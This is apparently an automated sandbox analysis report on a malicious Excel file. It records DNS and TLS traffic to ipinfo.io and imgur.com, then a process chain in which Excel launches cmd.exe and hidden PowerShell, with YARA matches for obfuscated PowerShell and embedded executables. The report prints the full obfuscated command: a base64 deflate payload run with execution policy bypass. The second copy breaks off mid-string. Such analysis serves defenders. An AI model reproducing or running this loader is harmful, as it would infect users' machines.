Feb 28, 2019 14:46:21.633205891 CET	8.8.8.8	192.168.1.16	0x4f68	No error (0)	ipinfo.io		216.239.34.21	A (IP address)	IN (0x0001)
Feb 28, 2019 14:46:21.633205891 CET	8.8.8.8	192.168.1.16	0x4f68	No error (0)	ipinfo.io		216.239.36.21	A (IP address)	IN (0x0001)
Feb 28, 2019 14:46:21.727161884 CET	8.8.8.8	192.168.1.16	0xdace	No error (0)	ipinfo.io		216.239.34.21	A (IP address)	IN (0x0001)
Feb 28, 2019 14:46:21.727161884 CET	8.8.8.8	192.168.1.16	0xdace	No error (0)	ipinfo.io		216.239.38.21	A (IP address)	IN (0x0001)
Feb 28, 2019 14:46:21.727161884 CET	8.8.8.8	192.168.1.16	0xdace	No error (0)	ipinfo.io		216.239.36.21	A (IP address)	IN (0x0001)
Feb 28, 2019 14:46:21.727161884 CET	8.8.8.8	192.168.1.16	0xdace	No error (0)	ipinfo.io		216.239.32.21	A (IP address)	IN (0x0001)

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Feb 28, 2019 14:45:31.684791088 CET	151.101.36.193	443	192.168.1.16	49224	CN=*.imgur.com, O="Imgur, Inc.", L=San Francisco, ST=California, C=US CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US	CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Fri Dec 14 01:00:00 CET 2018 Fri Mar 08 13:00:00 CET 2013	Wed Feb 12 13:00:00 CET 2020 Wed Mar 08 13:00:00 CET 2023	769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,0	05af1f5ca1b87cc9cc9b25185115607d
Feb 28, 2019 14:45:31.684791088 CET	151.101.36.193	443	192.168.1.16	49224	CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Fri Mar 08 13:00:00 CET 2013	Wed Mar 08 13:00:00 CET 2023		05af1f5ca1b87cc9cc9b25185115607d
Feb 28, 2019 14:45:37.121712923 CET	216.239.34.21	443	192.168.1.16	49226	CN=ipinfo.io CN=Let's Encrypt Authority X3, O=Let's Encrypt, C=US	CN=Let's Encrypt Authority X3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.	Tue Feb 19 11:22:45 CET 2019 Thu Mar 17 17:40:46 CET 2016	Mon May 20 12:22:45 CEST 2019 Wed Mar 17 17:40:46 CET 2021	769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,0	05af1f5ca1b87cc9cc9b25185115607d
Feb 28, 2019 14:45:37.121712923 CET	216.239.34.21	443	192.168.1.16	49226	CN=Let's Encrypt Authority X3, O=Let's Encrypt, C=US	CN=DST Root CA X3, O=Digital Signature Trust Co.	Thu Mar 17 17:40:46 CET 2016	Wed Mar 17 17:40:46 CET 2021		05af1f5ca1b87cc9cc9b25185115607d
Feb 28, 2019 14:46:09.807869911 CET	151.101.36.193	443	192.168.1.16	49230	CN=*.imgur.com, O="Imgur, Inc.", L=San Francisco, ST=California, C=US CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US	CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Fri Dec 14 01:00:00 CET 2018 Fri Mar 08 13:00:00 CET 2013	Wed Feb 12 13:00:00 CET 2020 Wed Mar 08 13:00:00 CET 2023	769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,0	05af1f5ca1b87cc9cc9b25185115607d
Feb 28, 2019 14:46:09.807869911 CET	151.101.36.193	443	192.168.1.16	49230	CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Fri Mar 08 13:00:00 CET 2013	Wed Mar 08 13:00:00 CET 2023		05af1f5ca1b87cc9cc9b25185115607d
Feb 28, 2019 14:46:09.807926893 CET	151.101.36.193	443	192.168.1.16	49229	CN=*.imgur.com, O="Imgur, Inc.", L=San Francisco, ST=California, C=US CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US	CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Fri Dec 14 01:00:00 CET 2018 Fri Mar 08 13:00:00 CET 2013	Wed Feb 12 13:00:00 CET 2020 Wed Mar 08 13:00:00 CET 2023	769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,0	05af1f5ca1b87cc9cc9b25185115607d
Feb 28, 2019 14:46:09.807926893 CET	151.101.36.193	443	192.168.1.16	49229	CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Fri Mar 08 13:00:00 CET 2013	Wed Mar 08 13:00:00 CET 2023		05af1f5ca1b87cc9cc9b25185115607d
Feb 28, 2019 14:46:21.676141024 CET	216.239.32.21	443	192.168.1.16	49233	CN=ipinfo.io CN=Let's Encrypt Authority X3, O=Let's Encrypt, C=US	CN=Let's Encrypt Authority X3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.	Tue Feb 19 11:22:45 CET 2019 Thu Mar 17 17:40:46 CET 2016	Mon May 20 12:22:45 CEST 2019 Wed Mar 17 17:40:46 CET 2021	769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,0	05af1f5ca1b87cc9cc9b25185115607d
Feb 28, 2019 14:46:21.676141024 CET	216.239.32.21	443	192.168.1.16	49233	CN=Let's Encrypt Authority X3, O=Let's Encrypt, C=US	CN=DST Root CA X3, O=Digital Signature Trust Co.	Thu Mar 17 17:40:46 CET 2016	Wed Mar 17 17:40:46 CET 2021		05af1f5ca1b87cc9cc9b25185115607d
Feb 28, 2019 14:46:21.779289007 CET	216.239.34.21	443	192.168.1.16	49234	CN=ipinfo.io CN=Let's Encrypt Authority X3, O=Let's Encrypt, C=US	CN=Let's Encrypt Authority X3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.	Tue Feb 19 11:22:45 CET 2019 Thu Mar 17 17:40:46 CET 2016	Mon May 20 12:22:45 CEST 2019 Wed Mar 17 17:40:46 CET 2021	769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,0	05af1f5ca1b87cc9cc9b25185115607d
Feb 28, 2019 14:46:21.779289007 CET	216.239.34.21	443	192.168.1.16	49234	CN=Let's Encrypt Authority X3, O=Let's Encrypt, C=US	CN=DST Root CA X3, O=Digital Signature Trust Co.	Thu Mar 17 17:40:46 CET 2016	Wed Mar 17 17:40:46 CET 2021		05af1f5ca1b87cc9cc9b25185115607d

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXE PID: 2460 Parent PID: 532

General

Start time:	14:44:43
Start date:	28/02/2019
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase:	0x2f7f0000
File size:	20392608 bytes
MD5 hash:	716335EDBB91DA84FC102425BFDA957E
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: cmd.exe PID: 2732 Parent PID: 2460

General

Start time:	14:44:56
Start date:	28/02/2019
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	CMD /c 'seT MXO= ^& ((gV 'mdR').NAME[3,11,2]-jOIn'')( neW-oBjecT IO.ComprEssION.DeFlAtestreaM([iO.memoRyStREAm] [COnVeRt]::fROmbAsE64STriNG( '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' ), [SySTEM.IO.comPREsSiOn.compreSSionMODE]::DEcoMpresS ) ^\| FOReach{neW-oBjecT IO.STreamreadEr($_, [SySTem.TExt.enCODINg]::aScIi) }^\|FOrEAch {$_.rEadToenD()} ) && poweRSheLL -WindOWSTylE HIdDEn -NONiNteRAC -NoPrOfIlE -NOL -exeCUt bYpASS sv ( 'yUC'+ '5' ) ( [typE](\'{0}{3}{2}{1}\'-F 'e','eNt','ironm','nv' ) ) ;${EXECUTIOnCoNtEXt}.\'INvoKEco`mMa`ND\'.\'Invo`KEs`CRIPT\'( ( ( ITem ( 'vA'+ 'RiaBl' + 'E:' +'YuC5' ) ).ValUE::( \'{4}{5}{2}{0}{6}{3}{1}\' -f'me','E','on','rIabl','gETenvi','R','nTVa' ).Invoke('MXO',( \'{1}{0}\'-f's','ProCES' ) ) ) )'
Imagebase:	0x4a1d0000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: powershell.exe PID: 2472 Parent PID: 2732

General

Start time:	14:44:56
Start date:	28/02/2019
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	poweRSheLL -WindOWSTylE HIdDEn -NONiNteRAC -NoPrOfIlE -NOL -exeCUt bYpASS sv ( 'yUC'+ '5' ) ( [typE](\'{0}{3}{2}{1}\'-F 'e','eNt','ironm','nv' ) ) ;${EXECUTIOnCoNtEXt}.\'INvoKEco`mMa`ND\'.\'Invo`KEs`CRIPT\'( ( ( ITem ( 'vA'+ 'RiaBl' + 'E:' +'YuC5' ) ).ValUE::( \'{4}{5}{2}{0}{6}{3}{1}\' -f'me','E','on','rIabl','gETenvi','R','nTVa' ).Invoke('MXO',( \'{1}{0}\'-f's','ProCES' ) ) ) )
Imagebase:	0x225e0000
File size:	452608 bytes
MD5 hash:	92F44E405DB16AC55D97E3BFE3B132FA
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: Embedded_PE, Description: unknown, Source: 00000004.00000002.1674260172.01880000.00000008.sdmp, Author: unknown Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000004.00000003.1637989998.001DA000.00000004.sdmp, Author: Florian Roth Rule: Embedded_PE, Description: unknown, Source: 00000004.00000002.1679049173.04370000.00000004.sdmp, Author: unknown Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000004.00000003.1635248316.00010000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000004.00000002.1672911724.00080000.00000004.sdmp, Author: Florian Roth Rule: Embedded_PE, Description: unknown, Source: 00000004.00000002.1677284178.01BB0000.00000008.sdmp, Author: unknown Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000004.00000002.1673377572.01260000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000004.00000000.1635094604.00010000.00000004.sdmp, Author: Florian Roth Rule: Embedded_PE, Description: unknown, Source: 00000004.00000002.1679114701.04400000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000004.00000002.1672890417.00060000.00000008.sdmp, Author: unknown Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000004.00000002.1673047466.00190000.00000004.sdmp, Author: Florian Roth Rule: Embedded_PE, Description: unknown, Source: 00000004.00000002.1673224653.01080000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000004.00000002.1673691174.01640000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000004.00000002.1674343739.019B0000.00000002.sdmp, Author: unknown
Reputation:	high

Analysis Process: csc.exe PID: 884 Parent PID: 2472

General

Start time:	14:44:59
Start date:	28/02/2019
Path:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ua6j8io5.cmdline'
Imagebase:	0x400000
File size:	77960 bytes
MD5 hash:	0A1C81BDCB030222A0B0A652B2C89D8D
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: Embedded_PE, Description: unknown, Source: 00000005.00000002.1650835635.00360000.00000002.sdmp, Author: unknown
Reputation:	moderate

Analysis Process: cvtres.exe PID: 912 Parent PID: 884

General

Start time:	14:45:00
Start date:	28/02/2019
Path:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user~1\AppData\Local\Temp\RESADE4.tmp' 'c:\Users\user\AppData\Local\Temp\CSCAD75.tmp'
Imagebase:	0x400000
File size:	32912 bytes
MD5 hash:	200FC355F85ECD4DB77FB3CAB2D01364
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: cmd.exe PID: 3880 Parent PID: 2460

General

Start time:	14:45:26
Start date:	28/02/2019
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	CMD /c 'seT MXO= ^& ((gV 'mdR').NAME[3,11,2]-jOIn'')( neW-oBjecT IO.ComprEssION.DeFlAtestreaM([iO.memoRyStREAm] [COnVeRt]::fROmbAsE64STriNG( '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